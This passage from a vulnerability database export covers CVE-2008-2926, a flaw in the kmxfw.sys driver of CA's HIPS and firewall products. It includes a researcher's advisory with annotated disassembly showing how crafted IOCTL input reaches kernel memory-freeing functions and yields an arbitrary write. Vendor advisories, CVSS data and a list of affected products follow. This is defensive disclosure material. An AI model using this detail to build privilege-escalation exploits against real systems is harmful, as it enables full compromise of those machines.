"data": [
{
"trust": 2.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=214665"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/505881/100/0/threaded"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2740"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-2740"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/505881/100/0/threaded"
},
{
"trust": 0.4,
"url": " http://www.ivizsecurity.com/security-advisory-iviz-sr-09005.html"
},
{
"trust": 0.3,
"url": "http://www.ca.com/us/products/product.aspx?id=5785"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2740"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=17"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=21"
},
{
"trust": 0.1,
"url": "http://www.ivizsecurity.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "BID",
"id": "36078"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "PACKETSTORM",
"id": "80522"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "BID",
"id": "36078"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "PACKETSTORM",
"id": "80522"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-08-19T00:00:00",
"db": "VULHUB",
"id": "VHN-40186"
},
{
"date": "2009-08-18T00:00:00",
"db": "BID",
"id": "36078"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"date": "2009-08-18T22:20:51",
"db": "PACKETSTORM",
"id": "80488"
},
{
"date": "2009-08-23T15:54:12",
"db": "PACKETSTORM",
"id": "80522"
},
{
"date": "2009-08-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200908-275"
},
{
"date": "2009-08-19T17:30:01.093000",
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-10T00:00:00",
"db": "VULHUB",
"id": "VHN-40186"
},
{
"date": "2009-08-21T15:54:00",
"db": "BID",
"id": "36078"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"date": "2009-08-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200908-275"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Host-Based Intrusion Prevention System of kmxIds.sys Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
],
"trust": 0.6
}
}
VAR-200808-0147
Vulnerability from variot - Updated: 2025-04-10 23:05The kmxfw.sys driver in CA Host-Based Intrusion Prevention System (HIPS) r8, as used in CA Internet Security Suite and Personal Firewall, does not properly verify IOCTL requests, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted request. Computer Associates products are prone to two vulnerabilities. Attackers may exploit the first vulnerability locally to execute arbitrary code with SYSTEM-level privileges or cause a system crash. Attackers may exploit the second vulnerability remotely to cause denial-of-service conditions. Successful attacks will completely compromise the computer or cause denial-of-service conditions. CA Host-Based Intrusion Prevention System (HIPS) is CA's host intrusion prevention system software. There is a vulnerability in the kmxfw.sys driver in CA HIPS r8.
No special user rights are necessary to exploit the vulnerability.
====================== Technical description: ======================
The IOCTL call 0x85000030 of the KmxFw.sys kernel driver shipped with various CA products accepts user supplied input that doesn't get validated enough. In consequence it is possible to pass arbitrary parameter values to some windows kernel functions (e.g. ExFreePoolWithTag). If these parameters are carefully crafted it is possible to force the windows kernel into performing a memory corruption that leads to full control of the kernel execution flow.
Disassembly of KmxFw.sys (version 6.5.5.5):
[...]
.text:00019800 mov eax, [esp+IOCTLControlCode] <-- (1)
.text:00019804 sub esp, 2Ch
.text:00019807 push ebx
.text:00019808 push esi
.text:00019809 push edi
.text:0001980A add eax, 7AFFFFFCh
.text:0001980F xor edi, edi
.text:00019811 xor ebx, ebx
.text:00019813 cmp eax, 4Ch ; switch 77 cases
.text:00019816 ja loc_19943 ; default
[...]
.text:0001981C movzx eax, ds:byte_19BA0[eax] <-- (2)
.text:00019823 jmp ds:off_19B6C[eax*4] ; switch jump
[...]
.text:000199E1 loc_199E1:
.text:000199E1 cmp [esp+38h+InputBufferSize], 10h <-- (3)
.text:000199E6 jb loc_19943 ; default
[...]
.text:000199EC mov eax, [esp+38h+InputBuffer] <-- (4)
.text:000199F0 mov ecx, [eax+8] <-- (5)
.text:000199F3 mov edx, [eax] <-- (6)
.text:000199F5 push ecx ; BaseAddress <-- (7)
.text:000199F6 push edx ; Mdl <-- (8)
.text:000199F7 mov ecx, offset off_28600
.text:000199FC call sub_12B70 <-- (9)
[...]
(1) IOCTL control code is copied into EAX (2) IOCTL control code switch cases (3) Switch case of the vulnerable IOCTL control code 0x85000030. There's also a minor check of the IOCTL input buffer size (must be greater than 0x10). (4) Pointer to user controlled data is copied into EAX (5) Part of the user controlled data is copied into ECX (6) Part of the user controlled data is copied into EDX (7) + (8) The user controlled values of ECX and EDX are used as parameters for the following function (sub_12B70) that gets called (9) The function sub_12B70 gets called
[...]
.text:00012B70 sub_12B70 proc near
.text:00012B70 Mdl_uc = dword ptr 4
.text:00012B70 BaseAddress_uc = dword ptr 8
.text:00012B70
.text:00012B70 push esi
.text:00012B71 mov esi, [esp+4+Mdl_uc] <-- (10)
.text:00012B75 test esi, esi
.text:00012B77 jz short loc_12B90
.text:00012B79 mov eax, [esp+4+BaseAddress_uc] <-- (11)
.text:00012B7D test eax, eax
.text:00012B7F jz short loc_12B89
.text:00012B81 push esi ; MemoryDescriptorList <-- (12)
.text:00012B82 push eax ; BaseAddress <-- (13)
.text:00012B83 call ds:MmUnmapLockedPages <-- (14)
.text:00012B89
.text:00012B89 loc_12B89:
.text:00012B89 push esi ; Mdl <-- (15)
.text:00012B8A call ds:IoFreeMdl <-- (16)
[...]
(10) User controlled data gets copied into ESI
(11) User controlled data gets copied into EAX
(12) + (13) The user controlled values of ESI and EAX are used as
parameters for the windows kernel function MmUnmapLockedPages
(14) The windows kernel function MmUnmapLockedPages gets called
(15) The user controlled value in ESI is used as a parameter for the
windows kernel function IoFreeMdl
(16) The windows kernel function IoFreeMdl gets called
In the IoFreeMdl function of the windows kernel the ExFreePoolWithTag function gets called with user controlled parameters.
Example of the IoFreeMdl function of the Windows 2000 Professional SP4 kernel:
[...]
.text:0041E700 ; void __stdcall IoFreeMdl(PMDL Mdl)
.text:0041E700 public IoFreeMdl
.text:0041E700 IoFreeMdl proc near
.text:0041E700
.text:0041E700 P = dword ptr 4
.text:0041E700
.text:0041E700 push esi
.text:0041E701 mov esi, [esp+4+P] <-- (17)
.text:0041E705 test byte ptr [esi+6], 20h
.text:0041E709 jz short loc_41E714
[...]
.text:0041E714 loc_41E714:
.text:0041E714 mov ax, [esi+6]
.text:0041E718 test al, 8
.text:0041E71A jz short loc_41E72B
[...]
.text:0041E72B
.text:0041E72B loc_41E72B:
.text:0041E72B push esi ; P <-- (18)
.text:0041E72C call ExFreePool <-- (19)
[...]
(17) The user controlled data gets copied into ESI (18) + (19) ESI is used as a parameter for the ExFreePool kernel function that calls ExFreePoolWithTag
If the user supplied parameter for ExFreePoolWithTag is carefully crafted it is possible to overwrite an arbitrary memory location with an arbitrary dword value (write4 primitive). This can be exploited to control the kernel execution flow and to execute arbitrary code at the kernel level.
========= Solution: =========
See vendor recommendations described under [1].
======== History: ========
2008/03/06 - Vendor notified using vuln@ca.com 2008/03/06 - Vendor response with PGP key 2008/03/08 - Detailed vulnerability information sent to the vendor 2008/03/08 - Vendor acknowledges receipt of the information 2008/08/12 - Coordinated disclosure
======== Credits: ========
Vulnerability found and advisory written by Tobias Klein.
=========== References: ===========
[1] http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559 [2] http://www.trapkit.de/advisories/TKADV2008-006.txt
======== Changes: ========
Revision 0.1 - Initial draft release to the vendor Revision 1.0 - Public release
=========== Disclaimer: ===========
The information within this advisory may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information.
================== PGP Signature Key: ==================
http://www.trapkit.de/advisories/tk-advisories-signature-key.asc
Copyright 2008 Tobias Klein.
2) An unspecified error in the kmxfw.sys driver can be exploited to cause a DoS.
PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Tobias Klein 2) Elazar Broad
ORIGINAL ADVISORY: CA: http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Title: CA Host-Based Intrusion Prevention System SDK kmxfw.sys Multiple Vulnerabilities
CA Advisory Date: 2008-08-11
Reported By: CVE-2008-2926 - Tobias Klein CVE-2008-3174 - Elazar Broad
Impact: A remote attacker can cause a denial of service or possibly execute arbitrary code. CA has issued updates to address the vulnerabilities. The first vulnerability, CVE-2008-2926, occurs due to insufficient verification of IOCTL requests by the kmxfw.sys driver. The second vulnerability, CVE-2008-3174, occurs due to insufficient validation by the kmxfw.sys driver. An attacker can make a request that can cause a system crash.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a Medium risk rating. CA Personal Firewall Engine 1.2.276 and later are not affected. To ensure that the latest automatic update is installed on your computer, customers can view the Help>About screen in their CA Personal Firewall product and confirm that the engine version number is 1.2.276 or higher. For support information, visit http://shop.ca.com/support.
How to determine if you are affected: 1. Using Windows Explorer, locate the file "kmxfw.sys". By default, the file is located in the "C:\Windows\system32\drivers\" directory. 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file version is less than indicated in the below table, the installation is vulnerable.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to our product security response team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj4DBQFIoduueSWR3+KUGYURAmmKAJ9FWl5gIZrbrGhg5CZ0NKzw0QE8qQCY+Qys ekQdlRjiIYnyp9WEqqGAxQ== =ltU4 -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200808-0147",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host based intrusion prevention system",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r8"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "personal firewall 2007",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "personal firewall 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "r8"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "2007"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "2008"
},
{
"model": "personal firewall",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "2007"
},
{
"model": "personal firewall",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "2008"
},
{
"model": "personal firewall 2007",
"scope": null,
"trust": 0.6,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.0"
},
{
"model": "personal firewall 2008",
"scope": null,
"trust": 0.6,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite 2008",
"scope": null,
"trust": 0.6,
"vendor": "ca",
"version": null
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2008"
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2007"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20070"
},
{
"model": "associates host-based intrusion prevention system r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates personal firewall engine",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.2.276"
}
],
"sources": [
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:host-based_intrusion_prevention_system",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:personal_firewall",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Tobias Klein, Elazar Broad",
"sources": [
{
"db": "BID",
"id": "30651"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
],
"trust": 0.9
},
"cve": "CVE-2008-2926",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2008-2926",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-33051",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2008-2926",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2008-2926",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200808-164",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-33051",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The kmxfw.sys driver in CA Host-Based Intrusion Prevention System (HIPS) r8, as used in CA Internet Security Suite and Personal Firewall, does not properly verify IOCTL requests, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted request. Computer Associates products are prone to two vulnerabilities. \nAttackers may exploit the first vulnerability locally to execute arbitrary code with SYSTEM-level privileges or cause a system crash. Attackers may exploit the second vulnerability remotely to cause denial-of-service conditions. \nSuccessful attacks will completely compromise the computer or cause denial-of-service conditions. CA Host-Based Intrusion Prevention System (HIPS) is CA\u0027s host intrusion prevention system software. There is a vulnerability in the kmxfw.sys driver in CA HIPS r8. \n\nNo special user rights are necessary to exploit the vulnerability. \n\n\n======================\nTechnical description:\n======================\n\nThe IOCTL call 0x85000030 of the KmxFw.sys kernel driver shipped with\nvarious CA products accepts user supplied input that doesn\u0027t get validated \nenough. In consequence it is possible to pass arbitrary parameter values \nto some windows kernel functions (e.g. ExFreePoolWithTag). If these \nparameters are carefully crafted it is possible to force the windows kernel\ninto performing a memory corruption that leads to full control of the \nkernel execution flow. \n\nDisassembly of KmxFw.sys (version 6.5.5.5):\n\n[...]\n.text:00019800 mov eax, [esp+IOCTLControlCode] \u003c-- (1)\n.text:00019804 sub esp, 2Ch\n.text:00019807 push ebx\n.text:00019808 push esi\n.text:00019809 push edi\n.text:0001980A add eax, 7AFFFFFCh\n.text:0001980F xor edi, edi\n.text:00019811 xor ebx, ebx\n.text:00019813 cmp eax, 4Ch ; switch 77 cases\n.text:00019816 ja loc_19943 ; default\n[...]\n.text:0001981C movzx eax, ds:byte_19BA0[eax] \u003c-- (2)\n.text:00019823 jmp ds:off_19B6C[eax*4] ; switch jump\n[...]\n.text:000199E1 loc_199E1: \n.text:000199E1 cmp [esp+38h+InputBufferSize], 10h \u003c-- (3)\n.text:000199E6 jb loc_19943 ; default\n[...]\n.text:000199EC mov eax, [esp+38h+InputBuffer] \u003c-- (4)\n.text:000199F0 mov ecx, [eax+8] \u003c-- (5)\n.text:000199F3 mov edx, [eax] \u003c-- (6)\n.text:000199F5 push ecx ; BaseAddress \u003c-- (7) \n.text:000199F6 push edx ; Mdl \u003c-- (8)\n.text:000199F7 mov ecx, offset off_28600\n.text:000199FC call sub_12B70 \u003c-- (9)\n[...]\n\n(1) IOCTL control code is copied into EAX\n(2) IOCTL control code switch cases\n(3) Switch case of the vulnerable IOCTL control code 0x85000030. There\u0027s\n also a minor check of the IOCTL input buffer size (must be greater than\n 0x10). \n(4) Pointer to user controlled data is copied into EAX\n(5) Part of the user controlled data is copied into ECX\n(6) Part of the user controlled data is copied into EDX\n(7) + (8) The user controlled values of ECX and EDX are used as parameters \n for the following function (sub_12B70) that gets called\n(9) The function sub_12B70 gets called\n\n[...]\n.text:00012B70 sub_12B70 proc near \n.text:00012B70 Mdl_uc = dword ptr 4\n.text:00012B70 BaseAddress_uc = dword ptr 8\n.text:00012B70\n.text:00012B70 push esi\n.text:00012B71 mov esi, [esp+4+Mdl_uc] \u003c-- (10)\n.text:00012B75 test esi, esi\n.text:00012B77 jz short loc_12B90\n.text:00012B79 mov eax, [esp+4+BaseAddress_uc] \u003c-- (11)\n.text:00012B7D test eax, eax\n.text:00012B7F jz short loc_12B89\n.text:00012B81 push esi ; MemoryDescriptorList \u003c-- (12)\n.text:00012B82 push eax ; BaseAddress \u003c-- (13)\n.text:00012B83 call ds:MmUnmapLockedPages \u003c-- (14)\n.text:00012B89\n.text:00012B89 loc_12B89: \n.text:00012B89 push esi ; Mdl \u003c-- (15)\n.text:00012B8A call ds:IoFreeMdl \u003c-- (16)\n[...]\n\n(10) User controlled data gets copied into ESI\n(11) User controlled data gets copied into EAX\n(12) + (13) The user controlled values of ESI and EAX are used as \n parameters for the windows kernel function MmUnmapLockedPages\n(14) The windows kernel function MmUnmapLockedPages gets called\n(15) The user controlled value in ESI is used as a parameter for the \n windows kernel function IoFreeMdl\n(16) The windows kernel function IoFreeMdl gets called\n\nIn the IoFreeMdl function of the windows kernel the ExFreePoolWithTag \nfunction gets called with user controlled parameters. \n \nExample of the IoFreeMdl function of the Windows 2000 Professional SP4 \nkernel:\n \n[...]\n.text:0041E700 ; void __stdcall IoFreeMdl(PMDL Mdl)\n.text:0041E700 public IoFreeMdl\n.text:0041E700 IoFreeMdl proc near \n.text:0041E700\n.text:0041E700 P = dword ptr 4\n.text:0041E700\n.text:0041E700 push esi\n.text:0041E701 mov esi, [esp+4+P] \u003c-- (17)\n.text:0041E705 test byte ptr [esi+6], 20h\n.text:0041E709 jz short loc_41E714\n[...]\n.text:0041E714 loc_41E714: \n.text:0041E714 mov ax, [esi+6]\n.text:0041E718 test al, 8\n.text:0041E71A jz short loc_41E72B\n[...]\n.text:0041E72B\n.text:0041E72B loc_41E72B:\n.text:0041E72B push esi ; P \u003c-- (18)\n.text:0041E72C call ExFreePool \u003c-- (19)\n[...]\n\n(17) The user controlled data gets copied into ESI\n(18) + (19) ESI is used as a parameter for the ExFreePool kernel function \n that calls ExFreePoolWithTag\n\nIf the user supplied parameter for ExFreePoolWithTag is carefully crafted \nit is possible to overwrite an arbitrary memory location with an arbitrary \ndword value (write4 primitive). This can be exploited to control the kernel\nexecution flow and to execute arbitrary code at the kernel level. \n\n\n=========\nSolution:\n=========\n\n See vendor recommendations described under [1]. \n\n\n========\nHistory:\n========\n\n 2008/03/06 - Vendor notified using vuln@ca.com\n 2008/03/06 - Vendor response with PGP key\n 2008/03/08 - Detailed vulnerability information sent to the vendor \n 2008/03/08 - Vendor acknowledges receipt of the information\n 2008/08/12 - Coordinated disclosure\n\n\n========\nCredits:\n========\n\n Vulnerability found and advisory written by Tobias Klein. \n\n\n===========\nReferences:\n===========\n\n [1] http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559\n [2] http://www.trapkit.de/advisories/TKADV2008-006.txt\n\n\n========\nChanges:\n========\n\n Revision 0.1 - Initial draft release to the vendor\n Revision 1.0 - Public release\n\n\n===========\nDisclaimer:\n===========\n\nThe information within this advisory may change without notice. Use\nof this information constitutes acceptance for use in an AS IS\ncondition. There are no warranties, implied or express, with regard\nto this information. In no event shall the author be liable for any\ndirect or indirect damages whatsoever arising out of or in connection\nwith the use or spread of this information. \n\n\n==================\nPGP Signature Key:\n==================\n\n http://www.trapkit.de/advisories/tk-advisories-signature-key.asc\n\n\nCopyright 2008 Tobias Klein. \n\n2) An unspecified error in the kmxfw.sys driver can be exploited to\ncause a DoS. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits:\n1) Tobias Klein\n2) Elazar Broad\n\nORIGINAL ADVISORY:\nCA:\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nTitle: CA Host-Based Intrusion Prevention System SDK kmxfw.sys \nMultiple Vulnerabilities\n\n\nCA Advisory Date: 2008-08-11\n\n\nReported By:\nCVE-2008-2926 - Tobias Klein\nCVE-2008-3174 - Elazar Broad\n\n\nImpact: A remote attacker can cause a denial of service or \npossibly execute arbitrary code. CA has issued \nupdates to address the vulnerabilities. The first vulnerability, \nCVE-2008-2926, occurs due to insufficient verification of IOCTL \nrequests by the kmxfw.sys driver. The second vulnerability, \nCVE-2008-3174, occurs due to insufficient validation by the \nkmxfw.sys driver. An attacker can make a request that can cause a \nsystem crash. \n\n\nMitigating Factors: None\n\n\nSeverity: CA has given these vulnerabilities a Medium risk rating. CA Personal Firewall Engine 1.2.276 and later are not \naffected. To ensure that the latest automatic update is installed \non your computer, customers can view the Help\u003eAbout screen in \ntheir CA Personal Firewall product and confirm that the engine \nversion number is 1.2.276 or higher. For support information, \nvisit http://shop.ca.com/support. \n\n\nHow to determine if you are affected:\n1. Using Windows Explorer, locate the file \"kmxfw.sys\". By default, \n the file is located in the \"C:\\Windows\\system32\\drivers\\\" directory. \n2. Right click on the file and select Properties. \n3. Select the General tab. \n4. If the file version is less than indicated in the below table, \n the installation is vulnerable. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your \nfindings to our product security response team. \nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA 